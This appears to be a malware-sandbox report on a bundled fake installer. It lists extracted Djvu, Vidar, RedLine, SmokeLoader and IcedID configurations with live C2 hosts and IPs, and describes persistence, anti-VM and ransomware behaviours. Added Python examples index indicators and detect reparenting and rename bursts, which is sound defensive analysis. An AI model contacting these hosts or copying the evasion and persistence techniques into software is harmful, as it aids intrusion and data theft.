Overview
Score: 10/10 on the static analysis and on every behavioral run.
Analysis tabs (each scored 10): Static; setup_x86_...ll.exe on windows7_x64, windows11_x64 and windows10_x64 (the individual runs are listed under Tasks below).
Analysis
max time kernel: 1805s
max time network: 1806s
platform: windows10_x64
resource: win10-fr (this is behavioral7; the memory-dump paths in the signature rows below, behavioral7/memory/..., refer to this run)
submitted: 18-09-2021 21:25
Tasks
static1: static task
behavioral1: sample setup_x86_x64_install.exe, resource win7-ja-20210916
behavioral2: sample setup_x86_x64_install.exe, resource win7v20210408
behavioral3: sample setup_x86_x64_install.exe, resource win7-de-20210916
behavioral4: sample setup_x86_x64_install.exe, resource win11
behavioral5: sample setup_x86_x64_install.exe, resource win10v20210408
behavioral6: sample setup_x86_x64_install.exe, resource win10-jp
behavioral7: sample setup_x86_x64_install.exe, resource win10-fr
General
Target: setup_x86_x64_install.exe
Size: 4.3MB
MD5: c9b742fa61ccc9b3afa7217f3bfe2590
SHA1: 7c1ddc294d0d9214c1e07ba239d24ffd2a01854d
SHA256: 5967f1aef118ddfcd1d14d5cf3f29a62a845052c9ed9ce91587c0015b1047c58
SHA512: 27b326724da58f967c49eb0f889af63636b2f7e49b1356bf76677fcc419f8eca41eb8f2fbddc4599f1f3e83fffa6a98a2b74315857f909d78254d4083c381f99
Malware Config
The sample is a bundle: seven separate configurations were carved out of the processes it dropped, one of them without a family attribution.

Extracted (no family name given)
URL: http://shellloader.com/welcome

Extracted: djvu
Ransom note path: C:\_readme.txt
Emails: manager@mailtemp.ch, managerhelper@airmail.cc
URL: https://we.tl/t-vtoEIhR0SI

Extracted: vidar
Version: 40.7
Botnet: 706
C2: https://petrenko96.tumblr.com/
Attributes: profile_id = 706

Extracted: redline
Botnet: ANI
C2: 45.142.215.47:27643

Extracted: smokeloader
Version: 2020
C2:
http://varmisende.com/upload/
http://fernandomayol.com/upload/
http://nextlytm.com/upload/
http://people4jan.com/upload/
http://asfaltwerk.com/upload/

Extracted: redline
Botnet: pab123
C2: 45.14.49.169:22411

Extracted: icedid
Campaign: 3162718704
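Turning the config block above into something a detection pipeline can consume means normalising it, defanging it for reports, and deciding what is safe to block. Two of the URLs sit on legitimate services (the Vidar profile on tumblr.com, the Djvu link on we.tl), so a host-level block would be wrong there. The following is an added example, not code from the sandbox vendor or from the report; the indicator values are the ones printed above, while the family labels for the two RedLine entries (suffixed with the botnet name), the SHARED_HOSTS list and the naive two-label "registrable domain" split are assumptions of the example.

```python
"""Normalise, defang and index the indicators from the report's
"Malware Config" section. Added example, not part of the sandbox report."""
from typing import Optional
from urllib.parse import urlsplit

# Indicator values copied from the report, grouped by the family the
# sandbox attributed them to. "unknown" is the first block, which the
# report printed without a family name. RedLine appears twice with
# different botnet names, so the label carries the botnet.
EXTRACTED_CONFIGS = {
    "unknown": {"urls": ["http://shellloader.com/welcome"]},
    "djvu": {
        "emails": ["manager@mailtemp.ch", "managerhelper@airmail.cc"],
        "urls": ["https://we.tl/t-vtoEIhR0SI"],
    },
    "vidar": {"urls": ["https://petrenko96.tumblr.com/"]},
    "redline/ANI": {"c2": ["45.142.215.47:27643"]},
    "smokeloader": {"urls": [
        "http://varmisende.com/upload/",
        "http://fernandomayol.com/upload/",
        "http://nextlytm.com/upload/",
        "http://people4jan.com/upload/",
        "http://asfaltwerk.com/upload/",
    ]},
    "redline/pab123": {"c2": ["45.14.49.169:22411"]},
}

# Legitimate services abused for hosting (the report flags this pattern
# itself). Blocking the whole host would break the service for everyone,
# so these are matched on the full URL only. Assumption of this example.
SHARED_HOSTS = {"tumblr.com", "we.tl"}


def registrable(host: str) -> str:
    """Last two labels of a host name. Good enough for the hosts on this
    page; a real deployment should consult the public suffix list."""
    return ".".join(host.lower().split(".")[-2:])


def defang(value: str) -> str:
    """Rewrite an indicator so it cannot be clicked or resolved by accident:
    http -> hxxp, dots in the host -> [.], @ -> [at]."""
    if "://" in value:
        parts = urlsplit(value)
        scheme = parts.scheme.replace("http", "hxxp")
        host = parts.netloc.replace(".", "[.]")
        query = f"?{parts.query}" if parts.query else ""
        return f"{scheme}://{host}{parts.path}{query}"
    return value.replace(".", "[.]").replace("@", "[at]")


def build_index(configs):
    """Return lookup tables: host -> families, host:port -> families,
    full URL -> families (shared hosts only) and email -> families."""
    hosts, sockets, urls, emails = {}, {}, {}, {}
    for family, cfg in configs.items():
        for url in cfg.get("urls", []):
            host = urlsplit(url).hostname.lower()
            if registrable(host) in SHARED_HOSTS:
                urls.setdefault(url.rstrip("/"), set()).add(family)
            else:
                hosts.setdefault(host, set()).add(family)
        for c2 in cfg.get("c2", []):
            host, _, port = c2.rpartition(":")
            hosts.setdefault(host, set()).add(family)
            sockets.setdefault(f"{host}:{port}", set()).add(family)
        for mail in cfg.get("emails", []):
            emails.setdefault(mail.lower(), set()).add(family)
    return hosts, sockets, urls, emails


HOSTS, SOCKETS, URLS, EMAILS = build_index(EXTRACTED_CONFIGS)


def classify(host: str, port: Optional[int] = None,
             url: Optional[str] = None) -> set:
    """Families an observed destination matches. Shared-service hosts only
    match when the full URL is supplied, so generic tumblr.com traffic is
    not a hit but the exact Vidar profile page is."""
    hits = set(HOSTS.get(host.lower(), set()))
    if port is not None:
        hits |= SOCKETS.get(f"{host.lower()}:{port}", set())
    if url is not None:
        hits |= URLS.get(url.rstrip("/"), set())
    return hits


def defanged_report() -> list:
    """One 'family<TAB>kind<TAB>indicator' line per indicator, defanged."""
    lines = []
    for family, cfg in EXTRACTED_CONFIGS.items():
        for kind, values in cfg.items():
            lines.extend(f"{family}\t{kind}\t{defang(v)}" for v in values)
    return lines


if __name__ == "__main__":
    print("\n".join(defanged_report()))
```

The socket C2s are indexed both as bare host and as host:port, so a RedLine beacon is recognised from the IP alone, while the Vidar and Djvu URLs never enter the host table at all.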
Signatures
The counts after a signature name are the mapped ATT&CK techniques (TTPs) and the number of observed indicator rows (IoCs).

Djvu Ransomware
Ransomware which is a variant of the STOP family.

Modifies system executable filetype association 2 TTPs 3 IoCs
description | ioc | process
Key deleted | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx | OneDriveSetup.exe
Key created | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx | OneDriveSetup.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx\ = "{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}" | OneDriveSetup.exe
All three rows are OneDriveSetup.exe re-registering OneDrive's FileSyncEx shell extension (the key name really does begin with a space). The OneDrive updater ran during this analysis (see the OneDrive Standalone Update Task and the RunOnce cleanup entries further down), so confirm in the process tree before attributing this signature to the sample.
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description | pid | pid_target | process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4160 | 4028 | rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 9092 | 4028 | rundll32.exe
A child under wmiprvse.exe is what process creation through WMI (Win32_Process.Create) looks like: the caller never appears as the parent. Here that is more likely a loader stage launching rundll32.exe via WMI than a compromised WMI host; the WMIC.exe flows under "Blocklisted process makes network request" fit the same picture.
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

RedLine Payload 8 IoCs
resource | yara_rule
behavioral7/memory/5080-262-0x0000000000400000-0x0000000000422000-memory.dmp | family_redline
behavioral7/memory/5080-263-0x000000000041C5CA-mapping.dmp | family_redline
behavioral7/memory/3172-284-0x0000000002340000-0x000000000235F000-memory.dmp | family_redline
behavioral7/memory/3172-308-0x00000000024E0000-0x00000000024FE000-memory.dmp | family_redline
behavioral7/memory/5080-309-0x0000000005270000-0x0000000005876000-memory.dmp | family_redline
behavioral7/memory/2196-381-0x000000000041C5E2-mapping.dmp | family_redline
behavioral7/memory/3844-340-0x000000000041C5DE-mapping.dmp | family_redline
behavioral7/memory/3844-438-0x0000000005010000-0x0000000005616000-memory.dmp | family_redline
The RedLine hits are in PIDs 5080 (Sat2026ef0d60b87a3f5.exe), 3844 (5125044.scr), 2196 (tmpE781_tmp.exe) and 3172 (Sat20627fa1c49.exe); the first three are the child halves of the SetThreadContext pairs listed below, i.e. the payload was written into a suspended copy of the loader rather than run from disk.
Registers COM server for autorun 1 TTPs

SmokeLoader
Modular backdoor trojan in use since 2014.

Socelars Payload 2 IoCs
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\7zSC7375180\Sat20873bc74eb80e0.exe | family_socelars
C:\Users\Admin\AppData\Local\Temp\7zSC7375180\Sat20873bc74eb80e0.exe | family_socelars
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
description | pid | process | target process
PID 5548 created 4820 | 5548 | WerFault.exe | Sat200240b71b.exe
PID 7892 created 5608 | 7892 | WerFault.exe | Yry2f6UscYEHvhxNM_NasvjF.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
description | pid | process | target process
PID 6216 created 3720 | 6216 | svchost.exe | gWaq3hqPJ5rZctwz9iAX7kUB.exe
PID 6216 created 7212 | 6216 | svchost.exe | LzmwAqmV.exe
PID 6216 created 9276 | 6216 | svchost.exe | OneDriveSetup.exe
Both signatures fire when the process that called the create API is not the parent recorded on the new process. That is the footprint of explicit reparenting (PPID spoofing through a parent-process attribute), but Windows components do it legitimately as well: the WerFault.exe rows surround PID 4820, the Vidar process, which evidently crashed, and OneDriveSetup.exe is consistent with the OneDrive update task firing. Compare the creating PID with the recorded parent in the process tree before reading these rows as evasion by the sample.
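The two parent/child signatures above reduce to two checks on process-creation telemetry: a parent that should not be spawning children at all (wmiprvse.exe), and a creator PID that differs from the parent PID stamped on the new process. The following is an added example, not code from the report or the sandbox; the event records are constructed for it, reusing PIDs and image names that appear on this page (rundll32.exe 4160 under wmiprvse.exe 4028, svchost.exe 6216 creating gWaq3hqPJ5rZctwz9iAX7kUB.exe 3720) with the remaining fields, including which of the report's two PIDs is parent and child, assumed.

```python
"""Parent/child sanity checks over process-creation events.
Added example, not part of the sandbox report."""
from dataclasses import dataclass
from typing import Iterable, List


@dataclass(frozen=True)
class ProcCreate:
    pid: int            # new process
    image: str          # new process image name
    parent_pid: int     # parent recorded on the new process (what a ps tree shows)
    parent_image: str
    creator_pid: int    # PID that actually called NtCreateUserProcess / NtCreateProcessEx
    creator_image: str


# Parents with no business spawning arbitrary children. wmiprvse.exe hosts
# WMI providers; a child under it means someone called Win32_Process.Create.
# "*" flags every child; a set of image names restricts the rule.
# Assumption: this is the example's policy, not the sandbox's rule set.
UNEXPECTED_PARENTS = {
    "wmiprvse.exe": "*",
}


def check_events(events: Iterable[ProcCreate]) -> List[dict]:
    """Return one finding per violated rule; an event can trigger both."""
    findings = []
    for ev in events:
        allowed = UNEXPECTED_PARENTS.get(ev.parent_image.lower())
        if allowed == "*" or (allowed and ev.image.lower() in allowed):
            findings.append({
                "kind": "unexpected_child",
                "pid": ev.pid, "image": ev.image,
                "parent_pid": ev.parent_pid, "parent_image": ev.parent_image,
            })
        # Creator != recorded parent: either explicit reparenting by the
        # creator or a Windows service creating the process on another's
        # behalf. Worth a look either way; not proof of spoofing on its own.
        if ev.creator_pid != ev.parent_pid:
            findings.append({
                "kind": "other_parent_process",
                "pid": ev.pid, "image": ev.image,
                "parent_pid": ev.parent_pid, "parent_image": ev.parent_image,
                "creator_pid": ev.creator_pid, "creator_image": ev.creator_image,
            })
    return findings


# Constructed events. PIDs and image names come from the report; the
# parent/creator pairing and the explorer.exe parent are assumed.
SAMPLE_EVENTS = [
    # WMI-driven launch: creator and parent agree, but the parent is wmiprvse.exe
    ProcCreate(4160, "rundll32.exe", 4028, "wmiprvse.exe", 4028, "wmiprvse.exe"),
    # reparented launch: svchost.exe 6216 created it, explorer.exe is recorded as parent
    ProcCreate(3720, "gWaq3hqPJ5rZctwz9iAX7kUB.exe", 4440, "explorer.exe", 6216, "svchost.exe"),
    # ordinary child: nothing to report
    ProcCreate(5088, "setup_install.exe", 4988, "setup_installer.exe", 4988, "setup_installer.exe"),
]


def summarize(findings: List[dict]) -> dict:
    """Count findings per kind, the shape a dashboard or alert would want."""
    counts: dict = {}
    for f in findings:
        counts[f["kind"]] = counts.get(f["kind"], 0) + 1
    return counts


if __name__ == "__main__":
    for f in check_events(SAMPLE_EVENTS):
        print(f)
```

Sysmon's process-creation event records only the parent field, so the second check needs a source that exposes the creator (the kernel process-tracing ETW provider does; so does the sandbox's hook of the native create API, which is where these two signatures come from).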
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs

Vidar Stealer 2 IoCs
resource | yara_rule
behavioral7/memory/4820-243-0x0000000000AF0000-0x0000000000BC4000-memory.dmp | family_vidar
behavioral7/memory/4820-244-0x0000000000400000-0x00000000004D7000-memory.dmp | family_vidar
PID 4820 is Sat200240b71b.exe (see "Executes dropped EXE"), the process WerFault.exe later attaches to.

ASPack-packed dropped libraries (yara_rule aspack_v212_v242) 7 IoCs
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\7zSC7375180\libcurlpp.dll | aspack_v212_v242
\Users\Admin\AppData\Local\Temp\7zSC7375180\libcurlpp.dll | aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zSC7375180\libstdc++-6.dll | aspack_v212_v242
\Users\Admin\AppData\Local\Temp\7zSC7375180\libstdc++-6.dll | aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zSC7375180\libcurl.dll | aspack_v212_v242
\Users\Admin\AppData\Local\Temp\7zSC7375180\libcurl.dll | aspack_v212_v242
\Users\Admin\AppData\Local\Temp\7zSC7375180\libcurl.dll | aspack_v212_v242
The page does not carry a signature title for this block; the rule name identifies ASPack versions 2.12 to 2.42. Stock libcurl and libstdc++ builds are not packed, so treat these copies as part of the dropper, not as reference libraries.
Blocklisted process makes network request 15 IoCs
flow | pid | process
203 | 5080 | schtasks.exe
229 | 5156 | schtasks.exe
235 | 5156 | schtasks.exe
236 | 5156 | schtasks.exe
287 | 6764 | powershell.exe
355 | 8468 | cmd.exe
356 | 8468 | cmd.exe
372 | 8284 | powershell.exe
396 | 8468 | cmd.exe
287 | 6764 | powershell.exe
203 | 5080 | schtasks.exe
52 | 5080 | schtasks.exe
443 | 8732 | WMIC.exe
445 | 8732 | WMIC.exe
512 | 10184 | rundll32.exe
Every process here is a signed Windows binary that has no reason to open a network connection on its own. WMIC.exe 8732 is the process 4769.exe set the thread context of (see "Suspicious use of SetThreadContext"), so its flows belong to the injected payload, and rundll32.exe 10184 also appears under "Loads dropped DLL".
Creates new service(s) 1 TTPs

Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs
description | ioc | process
File opened for modification | C:\Windows\system32\drivers\etc\hosts | Ze2ro.exe
Rewriting hosts is commonly done to sinkhole security-vendor or update domains; diff the file against a clean copy rather than just restoring it, since the entries also reveal what the sample wanted to block.
Executes dropped EXE 64 IoCs
pid | process
4988 | setup_installer.exe
5088 | setup_install.exe
4108 | Sat20873bc74eb80e0.exe
4444 | Sat2071d99516dc03841.exe
3128 | Sat20578e6239.exe
3424 | Sat20fbae42a4.exe
1016 | Sat20ecdfe3ee79f.exe
4604 | Sat205eb4a2ece877a.exe
4600 | Sat20ed203af5.exe
4632 | Sat20de8d8504.exe
732 | Sat2077373f11706fb7.exe
4640 | Sat20545a92617f.exe
3172 | Sat20627fa1c49.exe
4020 | Sat20fbae42a4.tmp
4820 | Sat200240b71b.exe
3860 | Sat2026ef0d60b87a3f5.exe
3356 | Ze2ro.exe
3036 | Sat2026ef0d60b87a3f5.exe
4456 | 7541406.scr
4668 | LzmwAqmV.exe
1640 | tmpE781_tmp.exe
5080 | Sat2026ef0d60b87a3f5.exe
1748 | 5875517.scr
1216 | UltraMediaBurner.exe
4796 | 8airpAP2vSR1mNtVUpIMLusz.exe
2468 | 5125044.scr
2700 | PublicDwlBrowser1100.exe
4384 | 2.exe
4204 | setup.exe
3360 | askinstall58.exe
3844 | 5125044.scr
4748 | 3040445.scr
1868 | LivelyScreenRecMik18.exe
5156 | 6.exe
5340 | Conhost.exe
2196 | tmpE781_tmp.exe
5632 | 9k747JMG7jwW9QQSPMvI1cd9.exe
5608 | Yry2f6UscYEHvhxNM_NasvjF.exe
5624 | qMwqayby3LtBSXcMFZn4WENT.exe
5616 | GM2TDOTFhN_nbC2OoeD2Rg86.exe
5692 | 3002.exe
5736 | 3AQleALHNNRtcBTszRyp7hDK.exe
5748 | Conhost.exe
2692 | hJfXrqQQ_Fe0h5fLGBSbNOgz.exe
3720 | gWaq3hqPJ5rZctwz9iAX7kUB.exe
976 | QXHofo5pEteva5oWRgeBqUVV.exe
3580 | jhuuee.exe
648 | 4x4_z5aLp04hx89ID2XGg6um.exe
3468 | PPlD8Z0K7d9WUvvAWu1vun4D.exe
3232 | OPlg5C44foFtCP1xTsMRcx2L.exe
1124 | pDOVOMsZF5WLWhICeZK_Vlir.exe
5052 | taskkill.exe
5128 | BearVpn 3.exe
2116 | hKGOBqPQ2CtFcQ7L_yVukhul.exe
4960 | elADi5yzsqicpvJG5uTkV55y.exe
4228 | bRJ06_QbRE9hlrR0l4Zuq2_k.exe
6292 | 8043795.exe
6604 | services64.exe
6832 | I3gaVL3bm1lMtsvde3S141IC.exe
5364 | f.exe
6940 | 4x4_z5aLp04hx89ID2XGg6um.exe
6120 | wwi.exe
5356 | wwl.exe
6340 | cm3.exe
The Sat20... executables come out of the 7zSC7375180 archive the installer unpacks into Temp; the random-name executables (qMwqayby..., gWaq3hqP..., and so on) are the second wave the first-stage loaders download.
Modifies Windows Firewall 1 TTPs

Modifies extensions of user files 6 IoCs
Ransomware generally changes the extension on encrypted files.
description | ioc | process
File renamed | C:\Users\Admin\Pictures\EnablePing.tiff => C:\Users\Admin\Pictures\EnablePing.tiff.koom | DCC6.exe
File opened for modification | C:\Users\Admin\Pictures\ExpandRestart.tiff | DCC6.exe
File renamed | C:\Users\Admin\Pictures\ExpandRestart.tiff => C:\Users\Admin\Pictures\ExpandRestart.tiff.koom | DCC6.exe
File renamed | C:\Users\Admin\Pictures\InvokeUpdate.raw => C:\Users\Admin\Pictures\InvokeUpdate.raw.koom | DCC6.exe
File renamed | C:\Users\Admin\Pictures\PublishImport.tif => C:\Users\Admin\Pictures\PublishImport.tif.koom | DCC6.exe
File opened for modification | C:\Users\Admin\Pictures\EnablePing.tiff | DCC6.exe
The appended .koom extension, the C:\_readme.txt note path in the extracted Djvu config and the SysHelper Run key pointing at DCC6.exe under AppData\Local\<GUID> (see "Adds Run key to start application") all point at DCC6.exe as the process behind the Djvu Ransomware hit. Files are opened for modification first and renamed afterwards, so the rename is the later, noisier event to alert on.
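The rows above are the behaviour a file-activity detector should catch before the Pictures folder is gone: one process appending the same new extension to many existing files in a short burst, with a ransom note dropped alongside. The following is an added example, not code from the report or the sandbox. The event stream is constructed for it: the DCC6.exe renames and the C:\_readme.txt path are taken from this page, the timestamps and the winword.exe control case are assumed.

```python
"""Burst detector for ransomware-style extension appends.
Added example, not part of the sandbox report."""
import ntpath  # Windows path semantics regardless of the host OS
from collections import defaultdict
from dataclasses import dataclass
from typing import Iterable, List, Optional

MIN_RENAMES = 3          # distinct files with the same appended extension...
WINDOW_SECONDS = 60.0    # ...within this window, per process
NOTE_NAMES = {"_readme.txt"}   # ransom note name from the extracted Djvu config


@dataclass(frozen=True)
class FileEvent:
    ts: float        # seconds since start of capture (assumed for the example)
    process: str
    op: str          # "rename", "create" or "modify"
    path: str
    new_path: str = ""


def appended_extension(old: str, new: str) -> Optional[str]:
    """'.koom' when new == old + '.koom' and the original name survives
    intact; None for ordinary renames such as ~WRD0001.tmp -> report.docx."""
    if not new.lower().startswith(old.lower()):
        return None
    suffix = new[len(old):]
    if len(suffix) < 2 or not suffix.startswith(".") or "." in suffix[1:] or "\\" in suffix:
        return None
    return suffix.lower()


def detect(events: Iterable[FileEvent]) -> List[dict]:
    """One finding per (process, extension) whose rename burst crosses the
    threshold, with any ransom notes that process created."""
    renames = defaultdict(list)   # process -> [(ts, ext, path)]
    notes = defaultdict(list)     # process -> [note paths]
    for ev in sorted(events, key=lambda e: e.ts):
        if ev.op == "rename":
            ext = appended_extension(ev.path, ev.new_path)
            if ext:
                renames[ev.process].append((ev.ts, ext, ev.path))
        elif ev.op == "create" and ntpath.basename(ev.path).lower() in NOTE_NAMES:
            notes[ev.process].append(ev.path)

    findings = []
    for proc, rows in renames.items():
        per_ext = defaultdict(list)
        for ts, ext, path in rows:
            per_ext[ext].append((ts, path))
        for ext, items in per_ext.items():
            # largest number of renames inside any WINDOW_SECONDS span
            best, start = 0, 0
            for i in range(len(items)):
                while items[i][0] - items[start][0] > WINDOW_SECONDS:
                    start += 1
                best = max(best, i - start + 1)
            if best >= MIN_RENAMES:
                findings.append({
                    "process": proc,
                    "extension": ext,
                    "files": len({p for _, p in items}),
                    "burst": best,
                    "ransom_notes": notes.get(proc, []),
                })
    return findings


PICS = r"C:\Users\Admin\Pictures"
# Constructed event stream: DCC6.exe rows from the report plus a benign
# Word save, which renames a temp file to a different name entirely.
SAMPLE_EVENTS = [
    FileEvent(10.0, "DCC6.exe", "create", r"C:\_readme.txt"),
    FileEvent(10.5, "DCC6.exe", "modify", PICS + r"\EnablePing.tiff"),
    FileEvent(10.6, "DCC6.exe", "rename", PICS + r"\EnablePing.tiff", PICS + r"\EnablePing.tiff.koom"),
    FileEvent(10.7, "DCC6.exe", "modify", PICS + r"\ExpandRestart.tiff"),
    FileEvent(10.8, "DCC6.exe", "rename", PICS + r"\ExpandRestart.tiff", PICS + r"\ExpandRestart.tiff.koom"),
    FileEvent(10.9, "DCC6.exe", "rename", PICS + r"\InvokeUpdate.raw", PICS + r"\InvokeUpdate.raw.koom"),
    FileEvent(11.1, "DCC6.exe", "rename", PICS + r"\PublishImport.tif", PICS + r"\PublishImport.tif.koom"),
    FileEvent(12.0, "winword.exe", "rename", r"C:\Users\Admin\Documents\~WRD0001.tmp",
              r"C:\Users\Admin\Documents\report.docx"),
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f)
```

Keying the burst on the appended extension rather than on rename volume alone is what keeps a large backup job or an archiver from tripping the rule: those rename many files, but not to name.ext.newext with the original name preserved.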
Sets service image path in registry 2 TTPs

Checks BIOS information in registry 2 TTPs 38 IoCs
BIOS information is often read in order to detect sandboxing environments.
All rows are "Key value queried" under \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System; SystemBiosVersion and VideoBiosVersion carry the hypervisor vendor strings on a VM.
process | values queried
qMwqayby3LtBSXcMFZn4WENT.exe | SystemBiosVersion, VideoBiosVersion
QXHofo5pEteva5oWRgeBqUVV.exe | SystemBiosVersion, VideoBiosVersion
pDOVOMsZF5WLWhICeZK_Vlir.exe | SystemBiosVersion, VideoBiosVersion
7048378.scr | SystemBiosVersion, VideoBiosVersion
6419.exe | SystemBiosVersion, VideoBiosVersion
BC4C.exe | SystemBiosVersion, VideoBiosVersion
wwi.exe | SystemBiosVersion, VideoBiosVersion
5875517.scr | SystemBiosVersion, VideoBiosVersion
3040445.scr | SystemBiosVersion, VideoBiosVersion
9k747JMG7jwW9QQSPMvI1cd9.exe | SystemBiosVersion, VideoBiosVersion
wwl.exe | SystemBiosVersion, VideoBiosVersion
A8C5.exe | SystemBiosVersion, VideoBiosVersion
8043795.exe | SystemBiosVersion, VideoBiosVersion
4203002.exe | SystemBiosVersion, VideoBiosVersion
D9E4.exe | SystemBiosVersion, VideoBiosVersion
I3gaVL3bm1lMtsvde3S141IC.exe | SystemBiosVersion, VideoBiosVersion
7963793.scr | SystemBiosVersion, VideoBiosVersion
EACD.exe | SystemBiosVersion, VideoBiosVersion
Install.exe | SystemBiosVersion
rundll32.exe | SystemBiosVersion
The same eighteen two-value processes reappear under the EnableLUA rows and under "Suspicious use of NtSetInformationThreadHideFromDebugger", which suggests one shared protection layer rather than eighteen independent implementations.

Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Control Panel\International\Geo\Nation | Sat20ecdfe3ee79f.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Control Panel\International\Geo\Nation | qT3dWYBP7ZsuOrwW4ZcUbjl6.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Control Panel\International\Geo\Nation | Direhilomi.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Control Panel\International\Geo\Nation | PovXUCA.exe
Loads dropped DLL 39 IoCs
pid | process | loads
5088 | setup_install.exe | 6
4020 | Sat20fbae42a4.tmp | 1
3504 | rundll32.exe | 1
5052 | taskkill.exe | 1
4228 | bRJ06_QbRE9hlrR0l4Zuq2_k.exe | 1
5652 | setup_2.tmp | 1
8960 | regsvr32.exe | 1
8980 | regsvr32.exe | 1
8468 | cmd.exe | 5
6096 | rundll32.exe | 1
9780 | regsvr32.exe | 1
9844 | regsvr32.exe | 1
9448 | build2.exe | 2
10092 | D8FD.exe | 5
10004 | 905.exe | 5
10184 | rundll32.exe | 1
4256 | FileSyncConfig.exe | 5
Modifies file permissions 1 TTPs 1 IoCs

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.

Themida-protected file (yara_rule themida) 1 IoCs
resource | yara_rule
C:\Users\Admin\AppData\Roaming\5875517.scr | themida
The page does not carry a signature title for this row. 5875517.scr (PID 1748) also appears in the BIOS-version, EnableLUA and ThreadHideFromDebugger lists; Themida's protection layer performs anti-debug checks of that kind itself, so some of those rows may belong to the packer rather than to the payload.
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs

Adds Run key to start application 2 TTPs 6 IoCs
description | ioc | process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Microsoft.NET\\Welaehywola.exe\"" | Ze2ro.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\7b094cea-f672-4562-9e16-411086b96df0\\DCC6.exe\" --AutoStart" | DCC6.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run\service = "C:\\Users\\Admin\\AppData\\Local\\Temp\\7916.exe" | 7916.exe
Key created | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce | OneDriveSetup.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Delete Cached Update Binary = "C:\\Windows\\system32\\cmd.exe /q /c del /q \"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\Update\\OneDriveSetup.exe\"" | OneDriveSetup.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Delete Cached Standalone Update Binary = "C:\\Windows\\system32\\cmd.exe /q /c del /q \"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdater\\OneDriveSetup.exe\"" | OneDriveSetup.exe
Three of the six rows are the OneDrive updater scheduling deletion of its own cached installer, which is normal. The sample's persistence is the other three: the machine-wide RunOnce "system recover" that Ze2ro.exe points at a dropped Welaehywola.exe under Program Files (x86)\Microsoft.NET (a directory name chosen to look like the .NET install), the per-user Run "SysHelper" that DCC6.exe points at its own copy under AppData\Local\<GUID> with --AutoStart, and the per-user Run "service" that 7916.exe points at itself in Temp. Two of the three launch from user-writable locations, which is the first thing to filter on when hunting these keys across a fleet.
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.

Reads the EnableLUA policy value 19 IoCs
The page does not carry a signature title for this block. Every row is a "Key value queried" of \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA, the value that says whether UAC is enabled; malware reads it to decide whether a UAC bypass or a prompt is needed before elevating.
process
D9E4.exe
EACD.exe
qMwqayby3LtBSXcMFZn4WENT.exe
pDOVOMsZF5WLWhICeZK_Vlir.exe
wwl.exe
4203002.exe
md8_8eus.exe
BC4C.exe
3040445.scr
QXHofo5pEteva5oWRgeBqUVV.exe
I3gaVL3bm1lMtsvde3S141IC.exe
A8C5.exe
9k747JMG7jwW9QQSPMvI1cd9.exe
8043795.exe
7963793.scr
6419.exe
5875517.scr
7048378.scr
wwi.exe
Drops desktop.ini file(s) 1 IoCs
description | ioc | process
File opened for modification | C:\$RECYCLE.BIN\S-1-5-18\desktop.ini | PovXUCA.exe
The S-1-5-18 recycle bin belongs to SYSTEM, so PovXUCA.exe was running as SYSTEM at this point.

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Looks up external IP address via web service 14 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
ioc | flows
ipinfo.io | 31, 32, 182, 183, 319
ip-api.com | 25, 128
api.2ip.ua | 297, 298, 365, 697, 698, 760, 777
